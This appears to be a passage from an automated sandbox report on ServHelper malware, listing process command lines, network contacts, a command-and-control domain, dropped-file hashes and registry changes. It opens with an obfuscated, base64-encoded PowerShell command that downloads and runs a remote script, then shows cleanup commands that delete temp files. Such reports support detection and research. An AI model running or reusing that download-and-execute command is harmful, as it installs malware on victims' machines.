powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 2no.co udp
N/A 88.99.66.31:443 2no.co tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 aasouv636d.cn udp
N/A 8.8.8.8:53 aasouv636d.cn udp
N/A 206.188.197.203:443 aasouv636d.cn tcp

Files

memory/916-60-0x00000000416A0000-0x0000000041AC0000-memory.dmp

memory/916-63-0x0000000041204000-0x0000000041206000-memory.dmp

memory/916-62-0x0000000041202000-0x0000000041204000-memory.dmp

memory/916-64-0x0000000041206000-0x0000000041207000-memory.dmp

memory/916-65-0x0000000041207000-0x0000000041208000-memory.dmp

memory/572-66-0x0000000000000000-mapping.dmp

memory/572-67-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp

memory/572-68-0x0000000001F80000-0x0000000001F81000-memory.dmp

memory/572-69-0x000000001AA50000-0x000000001AA51000-memory.dmp

memory/572-70-0x00000000023B0000-0x00000000023B1000-memory.dmp

memory/572-71-0x0000000002590000-0x0000000002591000-memory.dmp

memory/572-72-0x000000001A9D0000-0x000000001A9D2000-memory.dmp

memory/572-73-0x000000001A9D4000-0x000000001A9D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/572-75-0x000000001B430000-0x000000001B431000-memory.dmp

memory/984-76-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\njncjljq\njncjljq.cmdline

MD5 d36035ed73d1a98b8d18c98dd91716bb
SHA1 d44f4a82bdbc28d94c7eec784c6a5cfce86a5bfc
SHA256 cfdd96e93bb540aef6e6aeb8ebabab94de1e837d74eff066ab2ac0288ad4094f
SHA512 412c547d50ffe1fa7ae2bd5d2878e6aa1341ce6aec8efd7baa401b272ed8265e2f5dbf52b83a8b2a09787ea9150bbaa7bf79b6acd93170bd48cd7c9ed5b74d16

\??\c:\Users\Admin\AppData\Local\Temp\njncjljq\njncjljq.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/592-79-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\njncjljq\CSC30F7DDE84DB24FD2A41B632FCDB1EC79.TMP

MD5 dac0dc52a82ac6737d07f8d5a30e6eb9
SHA1 6c78fd1e70b16fc8058800b5ecfd304a60dc9408
SHA256 4e6f0c68979e48506bd0f175c61942b8bf75b3b7e65f5ccd016d6f57a3e029a4
SHA512 43f7562ca9117d5256ee18bc0036fde15ce6f040acb6aeba426322369a70c3057f4319dab3d64490d6517666ad39a0fe275971e031d2f868d0db90dc148ef375

C:\Users\Admin\AppData\Local\Temp\RES99C0.tmp

MD5 1fc16729b67df90b184d53dadd8b8eed
SHA1 08fad5def0bf882d4d07e52775f0c28f232bbca4
SHA256 6041637d96301ac65b1e8cf0b7cb21a1798facf510cc539ddb63f7ad12465339
SHA512 b9cf129d593529b8c750aea3b4056744768ad724340ae9ac63587988d695dbf5f49a13d548f1c872aa9889a27854b61ce2106d17a0864ff0b4605286eb037f71

C:\Users\Admin\AppData\Local\Temp\njncjljq\njncjljq.dll

MD5 2187bf7371eaded7dd51b1d0e7cf6b96
SHA1 9fa19c566ed3e927bdd1d99de030111a44f8ca3a
SHA256 56d956621d29457601ef5f4e27f740a70cbdd797c14036c6142143c85d0fabff
SHA512 20c27e9c157a7448968a34a07339288a0fe420540899e25cc30c9122668772ea32632fd471a8d84c15782e6c8ab42d3285fdef137815da24f94c8dbaeedc8376

memory/572-83-0x0000000001FD0000-0x0000000001FD1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 2ac58884a6bc6115ac734d8f7e9dcff5
SHA1 7f1a83359e741a82aae8ead8f1b2dd67e76d93a5
SHA256 a328305f6d633db8b9de84d59a608d477d58b6c78b6f26a57303ced1d1acbf53
SHA512 dacfdeafe0e5e5370a3f8a49ec4505840508888c642310b6e482b7559116948145682e9b3964617734a74dfa9ecfddf0b7bf90f7751c34d7d08f6b6d6d800d4c

memory/572-85-0x000000001B590000-0x000000001B591000-memory.dmp

memory/572-86-0x000000001B790000-0x000000001B791000-memory.dmp

memory/572-87-0x00000000026E0000-0x00000000026E1000-memory.dmp

memory/1784-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5279943a61e904630e934372f14002f6
SHA1 c1fd84be205b87a8d852c4ed6ef039f1716b512e
SHA256 212d83e8e664fc730e3fedec5b63afc757842bfe7ccae8f01cbec4c6a725b2a3
SHA512 60e2e2f45734a858c29ce4766568ea37140ec1b9499dd5af1e2416c59becec40d984f89c0c71e11e91173e2aeff5eb8ff63ab7c0a8cf23508a35e004bbf6e201

memory/1784-93-0x000000001ABF0000-0x000000001ABF2000-memory.dmp

memory/1784-94-0x000000001ABF4000-0x000000001ABF6000-memory.dmp

memory/1784-96-0x0000000002510000-0x0000000002511000-memory.dmp

memory/1784-98-0x000000001B6C0000-0x000000001B6C1000-memory.dmp

memory/1784-100-0x00000000027F0000-0x00000000027F1000-memory.dmp

memory/1784-101-0x0000000002330000-0x0000000002331000-memory.dmp

memory/572-102-0x000000001A9DA000-0x000000001A9F9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 2f4e081d5cbf8d35dac987738398ef02
SHA1 63e48e13aaaf89334fc3d875a5992434e322897e
SHA256 ba1f31e0eb7e8dacc7e77ebda62399b1ee919b2b0356721600c5aab34512d4fd
SHA512 430272821ae2aa224cd4660251622d6d0c0504ba4ab1a8de89034da618f6687e86a2e2a09804fc9d1653685276daff3a688e3fce9c93c31c459a5755521c00b6

memory/1784-107-0x000000001BA10000-0x000000001BA11000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_871b46de-2b40-4201-a27f-155dc70021b9

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4
SHA256 f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA512 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

memory/1784-120-0x000000001ABE0000-0x000000001ABE1000-memory.dmp

memory/1784-121-0x000000001B5F0000-0x000000001B5F1000-memory.dmp

memory/300-122-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5279943a61e904630e934372f14002f6
SHA1 c1fd84be205b87a8d852c4ed6ef039f1716b512e
SHA256 212d83e8e664fc730e3fedec5b63afc757842bfe7ccae8f01cbec4c6a725b2a3
SHA512 60e2e2f45734a858c29ce4766568ea37140ec1b9499dd5af1e2416c59becec40d984f89c0c71e11e91173e2aeff5eb8ff63ab7c0a8cf23508a35e004bbf6e201

memory/300-128-0x000000001A940000-0x000000001A942000-memory.dmp

memory/300-129-0x000000001A944000-0x000000001A946000-memory.dmp

memory/300-130-0x00000000023E0000-0x00000000023E1000-memory.dmp

memory/300-132-0x000000001B4E0000-0x000000001B4E1000-memory.dmp

memory/300-134-0x000000001B780000-0x000000001B781000-memory.dmp

memory/300-135-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 3be225af6a93dfbeb52b18bc2076adb3
SHA1 97cf3957a5c595c85e0f3f8cda043f5d54ffccd2
SHA256 f395c5a0922e8557305fccc431ec4a50c7ae3bd38c1452a9e93bf86c61c066a1
SHA512 4413953de815c8a1e0c9ada576f4f9143c8b4e1d9a5ab8555249fa0d405712fcf1faddc9e681d0f7687f4659742d8df92870bd215e20fff45c70036180ac2665

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5f7beb8c-e159-43c3-a6d8-fc7817d59b44

MD5 faa37917b36371249ac9fcf93317bf97
SHA1 a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256 b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cdfb8ac6-9c27-4037-a773-a8d8375c484c

MD5 a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA1 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256 dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA512 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d52c8b00-e6d3-4f14-97b8-e69367382d5e

MD5 2d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1 ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256 ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512 edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_295c844b-9e72-456e-847f-e4434e242194

MD5 d89968acfbd0cd60b51df04860d99896
SHA1 b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA256 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512 b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a06d569a-b6f1-480c-a0be-c830e764a87a

MD5 e5b3ba61c3cf07deda462c9b27eb4166
SHA1 b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256 b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512 a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b00c34c2-801c-46bc-8a2b-d59622cc8db2

MD5 7f79b990cb5ed648f9e583fe35527aa7
SHA1 71b177b48c8bd745ef02c2affad79ca222da7c33
SHA256 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA512 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

memory/1988-143-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5279943a61e904630e934372f14002f6
SHA1 c1fd84be205b87a8d852c4ed6ef039f1716b512e
SHA256 212d83e8e664fc730e3fedec5b63afc757842bfe7ccae8f01cbec4c6a725b2a3
SHA512 60e2e2f45734a858c29ce4766568ea37140ec1b9499dd5af1e2416c59becec40d984f89c0c71e11e91173e2aeff5eb8ff63ab7c0a8cf23508a35e004bbf6e201

memory/1988-148-0x000000001AB90000-0x000000001AB92000-memory.dmp

memory/1988-150-0x000000001AB94000-0x000000001AB96000-memory.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/572-158-0x000000001C710000-0x000000001C711000-memory.dmp

memory/792-159-0x0000000000000000-mapping.dmp

C:\Windows\system32\rfxvmt.dll

MD5 dc39d23e4c0e681fad7a3e1342a2843c
SHA1 58fd7d50c2dca464a128f5e0435d6f0515e62073
SHA256 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA512 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

memory/1144-161-0x0000000000000000-mapping.dmp

memory/1936-162-0x0000000000000000-mapping.dmp

memory/1592-163-0x0000000000000000-mapping.dmp

memory/1652-164-0x0000000000000000-mapping.dmp

memory/1680-165-0x0000000000000000-mapping.dmp

memory/952-166-0x0000000000000000-mapping.dmp

memory/1632-167-0x0000000000000000-mapping.dmp

memory/1388-168-0x0000000000000000-mapping.dmp

memory/1676-169-0x0000000000000000-mapping.dmp

memory/1484-170-0x0000000000000000-mapping.dmp

memory/1036-171-0x0000000000000000-mapping.dmp

memory/1600-172-0x0000000000000000-mapping.dmp

memory/944-173-0x0000000000000000-mapping.dmp

memory/1376-174-0x0000000000000000-mapping.dmp

memory/1960-175-0x0000000000000000-mapping.dmp

memory/1876-176-0x0000000000000000-mapping.dmp

memory/1988-177-0x0000000000000000-mapping.dmp

memory/1568-178-0x0000000000000000-mapping.dmp

memory/1508-179-0x0000000000000000-mapping.dmp

memory/1996-180-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 3a434e30924f88a47fa7fc31e1821106
SHA1 b0d245fb30c2b311a2cdf7998c5109a2151cf5a4
SHA256 c1908713db3a7c8fa0dda2f4a332b00b7082910a08704d4b37b26f39f4712b28
SHA512 74c0a5382a725c78db73b9dcc71445747b05171dda27c21d6688800323fb3daf365d6ce05259415db7e7504f42e401a2535a25eefa49988c605ae2853413e84e

\Windows\Branding\mediasvc.png

MD5 c174d5f4b03f158ed3c3ac6579bc9d9f
SHA1 9a3f5c59cdcefe0097accab914e1896030e40e62
SHA256 7ed9b5536d19ad840881d068719dbc95da230bf00ba647bf1340bc5666daf2c7
SHA512 8ebd5f4a064c960eaaf0d5be4fe1463aa85e092bf4a3f81d05bb14df6e5400c80a5018a1c2a0d94f4618ce032b41567e66d0f328b443c13e09ac9e0110004f17

memory/608-183-0x0000000000000000-mapping.dmp

memory/360-184-0x0000000000000000-mapping.dmp

memory/1484-185-0x0000000000000000-mapping.dmp

memory/1612-186-0x0000000000000000-mapping.dmp

memory/1376-187-0x0000000000000000-mapping.dmp

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1992-190-0x0000000000000000-mapping.dmp

memory/1696-191-0x0000000000000000-mapping.dmp

memory/1080-192-0x0000000000000000-mapping.dmp

memory/1388-193-0x0000000000000000-mapping.dmp

memory/1960-194-0x0000000000000000-mapping.dmp

memory/1336-195-0x0000000000000000-mapping.dmp

\??\PIPE\samr

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/972-197-0x0000000000000000-mapping.dmp

memory/948-198-0x0000000000000000-mapping.dmp

memory/360-199-0x0000000000000000-mapping.dmp

memory/1604-200-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1604-205-0x0000000019320000-0x0000000019322000-memory.dmp

memory/1604-206-0x0000000019324000-0x0000000019326000-memory.dmp

memory/1604-237-0x000000001932A000-0x0000000019349000-memory.dmp

memory/300-238-0x0000000000000000-mapping.dmp

memory/948-239-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-08-19 19:34

Reported

2021-08-19 19:37

Platform

win10v20210410

Max time kernel

50s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"

Signatures

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA88B.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA8DB.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA86B.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vlxy30jc.3bs.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA8EC.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ni1x2fi4.0wu.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA89C.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1400 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
